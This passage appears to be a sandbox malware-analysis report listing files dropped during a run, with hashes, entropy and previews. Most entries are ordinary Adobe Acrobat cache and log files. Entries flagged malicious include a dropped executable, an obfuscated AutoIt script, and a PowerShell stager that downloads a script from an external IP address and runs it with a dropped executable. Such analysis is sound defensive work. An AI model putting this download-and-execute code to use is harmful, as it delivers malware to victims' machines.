                                                                                        Preview:....... ...............X\...;...{......................0.`.....42...{5..7...|C.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................`'..7...|C..................Brl.7...|C..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08303339105154028
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YSYeLkrpvNt/57Dek3J7VrXAllEqW3l/TjzzQ/t:YSzLUvPR3t1Amd8/
                                                                                        MD5:7C336E3AD26945C0A1F1003A2A0B7BA0
                                                                                        SHA1:4B143A77C2A27FA9DD618FAD088217D9BC78A0BE
                                                                                        SHA-256:C97302458A1F74AEA09ADC35EE37BE46DB7DE402E4F2BEE338B57A52343FBC73
                                                                                        SHA-512:F99DB27734EA6F93AC0FBA4F46CB1323EE5B8F72AFFD29535DE373DE1968011216020A3C3E76694CEAC9EBDBC06A38A901F410435D767012FDA9CD26993097D5
                                                                                        Malicious:false
                                                                                        Preview:.dM......................................;...{...7...|C.42...{5.........42...{5.42...{5...Y.42...{59.................Brl.7...|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):893608
                                                                                        Entropy (8bit):6.62028134425878
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                        • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                        • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                        • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                                                        • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                                                        • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):484
                                                                                        Entropy (8bit):5.252282020229904
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:f73/oL0FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/m0CknZ9LzjYnRSb8Cba
                                                                                        MD5:F7641825D3071321407C6DE7A3B0DC6E
                                                                                        SHA1:69C8C8AB335618377ECCF232984E7EB9697D62BB
                                                                                        SHA-256:02A53A33EA74A9B1185C4DA503115C45E6F704B729F34F124FF3C49692DF7B86
                                                                                        SHA-512:471900CCE7B52955D3D430E8D096B9E0FC38ED2CABFE1D16E6E7EF8208754E608935B6C951442F11D21B008C8C08BC80EAA33FFE0A52A27E7B11BC89BD368407
                                                                                        Malicious:true
                                                                                        Preview:
                                                                                        [string]$fU5L = "http://139.99.188.124/EsgMle.txt"
                                                                                        [string]$oF6L = "C:\Users\Public\Secure.au3"
                                                                                        [string]$exePath = "C:\Users\Public\Guard.exe"

                                                                                        # Download the content from the URL
                                                                                        $wResp = New-Object System.Net.WebClient
                                                                                        $fCont = $wResp.DownloadString($fU5L)

                                                                                        # Save the downloaded content to the output file
                                                                                        Set-Content -Path $oF6L -Value $fCont -Encoding UTF8

                                                                                        # Run the executable with the output file as an argument
                                                                                        Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                        Category:dropped
                                                                                        Size (bytes):1244519
                                                                                        Entropy (8bit):5.142156508968495
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:28V+jcfSRkDQ5a1LYyQyFiI+SE71+KhpL0Wf+EpAlOQd:qcd7cfr5sWLHfvA
                                                                                        MD5:7094A5145C288E70D10E5AF0C49E2497
                                                                                        SHA1:CC12AC32757A8091281644DE8527F46E6E0945A8
                                                                                        SHA-256:D19010F3AD5B4E8A3EA748678F3C471E49C58F0AE3583B6698E30DE2D54E1AFD
                                                                                        SHA-512:D2B22BD157C7086C7533B4C6D154B11B9DEC7EC863DF71882D3BF23F543666F61091D6895B46DBAE1FFA30764AE4DF67B685F8D80C175F1E502FABBCBE9B1F5F
                                                                                        Malicious:true
                                                                                        Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):297
                                                                                        Entropy (8bit):5.267539148781079
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7P7pyq2PcNwi2nKuAl9OmbnIFUt8OPj3j1Zmw+OPWZRkwOcNwi2nKuAl9OmbjLJ:7lyvLZHAahFUt8ObZ/+OkR54ZHAaSJ
                                                                                        MD5:B2730C0DC373D0103FA4D5F87CDB8032
                                                                                        SHA1:CD293E43A43CA759CDC36FF009D4E47C55ECC3FF
                                                                                        SHA-256:A6B67FBFE28F4C2AA16408D5636E04E10E3833CB42711F7B10B022BB66F73625
                                                                                        SHA-512:EBA3170F910651FEE28C3F806D80A7B6661CC755B2C16209E50D51389EE48DBFD1A0C5A9CB21C59CA081542922CA07632CBC6634F20CAB1F00E276E075113FBA
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.572 cc4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/18-14:55:35.598 cc4 Recovering log #3.2024/12/18-14:55:35.599 cc4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):341
                                                                                        Entropy (8bit):5.2926280310398
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7PBxL4q2PcNwi2nKuAl9Ombzo2jMGIFUt8OPqTZZmw+OPP1kwOcNwi2nKuAl9OmT:7JxL4vLZHAa8uFUt8Oe/+OV54ZHAa8RJ
                                                                                        MD5:BA55094258142BE3B4F296DDE3F0A48D
                                                                                        SHA1:E89E5708036C089D168379CEA3593934B4D0A68B
                                                                                        SHA-256:2231F48D3FBCE0BA7BE67FDEE21BC92FCC644DBDAF74E2B64078B8A229827AF5
                                                                                        SHA-512:3DD73F6ED54290D591B0316CC27D109AD6AE028D080E20168A4999C14CEA622962BF62249906F66309DBB426C492929E6F939B020A79A2C239B188B3664F8D3B
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:35.677 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/18-14:55:35.678 9c4 Recovering log #3.2024/12/18-14:55:35.679 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.95774050953709
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq+sBdOg2HDqAAcaq3QYiubSpDyP7E4TX:Y2sRdsOdMHDqAr3QYhbSpDa7n7
                                                                                        MD5:31EA116B6245FB4037A724C6DBC82ABF
                                                                                        SHA1:C59CDB10CAB33B573A49979C61CA7D722959049A
                                                                                        SHA-256:18F20DCAB69BF421DAA7A25A69BF8CB238CA54F800094AC31E81C02A3BD828F3
                                                                                        SHA-512:17A52126651DBD2DE17416D2B7369FAE5E6C0B65190B3A5A8B89BC4BDA29672D4438923C8282526AED841E84CDAAAE7465E00E01E651C766DE6B40AC4911FC57
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379111749110363","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):4.95774050953709
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sq+sBdOg2HDqAAcaq3QYiubSpDyP7E4TX:Y2sRdsOdMHDqAr3QYhbSpDa7n7
                                                                                        MD5:31EA116B6245FB4037A724C6DBC82ABF
                                                                                        SHA1:C59CDB10CAB33B573A49979C61CA7D722959049A
                                                                                        SHA-256:18F20DCAB69BF421DAA7A25A69BF8CB238CA54F800094AC31E81C02A3BD828F3
                                                                                        SHA-512:17A52126651DBD2DE17416D2B7369FAE5E6C0B65190B3A5A8B89BC4BDA29672D4438923C8282526AED841E84CDAAAE7465E00E01E651C766DE6B40AC4911FC57
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379111749110363","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591315},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4099
                                                                                        Entropy (8bit):5.233033088153869
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPSpkHcC:CwNw1GHqPySfkcigoO3h28ytPSp8cC
                                                                                        MD5:D9F9DF4A594B42F6C092A07DC8D94FE3
                                                                                        SHA1:B17D75399A214DFCEFC664AFFA65C227ADDA5886
                                                                                        SHA-256:C0AACF957DE24888B44C9C498481EAEC89A7107FF11733302E379ABFA05A3635
                                                                                        SHA-512:BA19CC1D4F61C55D17A6D5B55CB95B988AAAE7ED27E77002827526F01EB735530C04B3BC43DD445CDEBBACADEF73E13DC2B71599D3EDF7EFF849D68B8BFB14DC
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):329
                                                                                        Entropy (8bit):5.263299823498246
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:7Pifq2PcNwi2nKuAl9OmbzNMxIFUt8OPiUtZmw+OPi7PkwOcNwi2nKuAl9OmbzNq:76fvLZHAa8jFUt8O6Ut/+O6754ZHAa8E
                                                                                        MD5:ED4622ED16E498547543162F9332BBC8
                                                                                        SHA1:0F1079AE4E2B4349D5B76EC0DD114BCF8145D6E1
                                                                                        SHA-256:4F407888D1CD23D73CD0F63A9FC76E703211184BD4FEE0CD05A95C864D8AF797
                                                                                        SHA-512:485D5E56E1C7BC266BBBEF47202041039DFB87FA5C14CD219489355239B2D9E9F49915A6D7487B60EF0F8E1CB758966DCB09E2415913EBCF5F36BBCACBFE533E
                                                                                        Malicious:false
                                                                                        Preview:2024/12/18-14:55:36.106 9c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-14:55:36.126 9c4 Recovering log #3.2024/12/18-14:55:36.134 9c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):1.1217569600910675
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:IMMNvEzMMT9M7ziVkMM1MMMMMMMMxMMM2MMM9MAMMBvMMneMMMzMMMMzMMMOfMQn:TOY
                                                                                        MD5:4B9C650BD0BCA8ECB718BF230E45A493
                                                                                        SHA1:8B7C0D60AC3B7CEB8E21C81736F9153A3B835ED7
                                                                                        SHA-256:88A9087C40E02862B1FBB69BB995341B2F1DDBF91C527BC3552012400FFC16E3
                                                                                        SHA-512:FF4892383ABE6645FB6983143B549C9548121B2C206DEFF54AE92C49EF9BC90AA6EFCD33B1F8EBBCFE171888B15E0C5A1F9A2677DE7F7743A0B4695059793998
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.439313673369037
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:yeaci5GIiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1kurVgazUpUTTGt
                                                                                        MD5:320EC049F194FFF73CF9C6E5D1BCD762
                                                                                        SHA1:E46C497334B1945EA908A5E086ABAFF746732C1F
                                                                                        SHA-256:54BB4DFE5AFE8D25F3C0B3718E8A9CA473F7CC5243484F4AC9C8DB9382C53E46
                                                                                        SHA-512:699D03559C4A6E09348B7B134827809448F07101F9295BCA4EDC0060699B9A5C1EBBB35E2D51D0626D3508C37B2BB53C663250C1D0325F2F2DD18125B954D313
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.777566408037077
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7Mzp/E2ioyVrioy3DoWoy1CABoy1fKOioy1noy1AYoy1Wioy1hioybioy7oy1noq:7Mpjur0iAJXKQSyb9IVXEBodRBke
                                                                                        MD5:055280F7B783B3C7C05B196C5CA21660
                                                                                        SHA1:868CE9D662735671E053ABCF95516C47038FDF3B
                                                                                        SHA-256:21EFED7CB1E4AAF9BDDAB162DCF0DD07FC8FB4BF3F7A0B01960E596E105DD03B
                                                                                        SHA-512:E34EAD766450BE0AF3BF7F24E0C42A4E5BC82AAFDE15A9A57FD20BC9D40AA42132E89E67AED26B198448ADCF47D531C3BE9A1A6C788F04F11EA5550185086252
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.7386214950254377
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFkljqXHkNvfllXlE/HT8k0RrXNNX8RolJuRdxLlGB9lQRYwpDdt:kKBXH9T89NMa8RdWBwRd
                                                                                        MD5:FE8CEDF77ED3167C33231ACB41102EEB
                                                                                        SHA1:8DEC929CB9C68E2F59F38F7CCCD9F4FA2DB35F35
                                                                                        SHA-256:A9DD42A74300539BAD9C8D95FDEF834BDD3C92E04E155294B7A269DAE000CE54
                                                                                        SHA-512:62EE7325BD3051B744766AF1B693EFAFA029D6CCA5E9431E76ED42320BEA4DFB884AA3979F83E188C1C09A43A3FF0F69D95564CD8558CC91DA81683916E620EF
                                                                                        Malicious:false
                                                                                        Preview:p...... .......... .Q..(....................................................... ..........W.....t..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.150184159866505
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKKF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:SsDnLNkPlE99SNxAhUe/3
                                                                                        MD5:429B460B1FC97A6814F5912C6FAEC2F3
                                                                                        SHA1:8CD387581A063260EE6E79CE9B63CD1C3D66891C
                                                                                        SHA-256:4EC31445F83F5C58057C11AA56060A2389F47D3AE027F4E381B1D7819256A80A
                                                                                        SHA-512:9F6C5C9A1FB6851A927C8E7DC46B107B9A4F4503CD1CEDA98AE9829CE8500BDDB1469B9906A64FFD104A22B07C3E25A18AFE8F7CFDA423492E83E5038A61AE5F
                                                                                        Malicious:false
                                                                                        Preview:p...... ........K.L.Q..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):1233
                                                                                        Entropy (8bit):5.233980037532449
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PostScript document text
                                                                                        Category:dropped
                                                                                        Size (bytes):10880
                                                                                        Entropy (8bit):5.214360287289079
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                        Malicious:false
                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.382891432266463
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJM3g98kUwPeUkwRe9:YvXKXXggfsdTeOVcQzGMbLUkee9
                                                                                        MD5:E566E015CAF83A02151B7243B29C72EB
                                                                                        SHA1:130C87BEA3EB394DB79E95FE916E4DCA408DCC72
                                                                                        SHA-256:7D71AA2988C2B4B336A83DD3FF48E4535BCCCC07F44564F00C5DBABB595384E2
                                                                                        SHA-512:3E8B418A83E4F295841B58FF5B03E87836F9ABD49DF19F47FEB8D3030758B52DC7B8317309FC17CB125737014BD8377F34A31C6951AADCC06202CC0BA3C7A8F3
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"1016880f-56ec-4315-b25c-39ddaa0848e5","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734730279956,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.318868324057958
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXXlho+Grct7b4WsGiIPEeOF0Y1cQIoAvJfBoTfXpnrPeUkwRe9:YvXKXXggfsdTeOVcQzGWTfXcUkee9
                                                                                        MD5:CB6F692B7A43C611AB490605754F038F
                                                                                        SHA1:01F7DA6FFCB9807C14E8BFA4340CCC7A0BEADF97
                                                                                        SHA-256:1E4E2C69F234BD9BC85C453DC699BA838F4AAAD53A069FD15ACE57079BE4AA4D
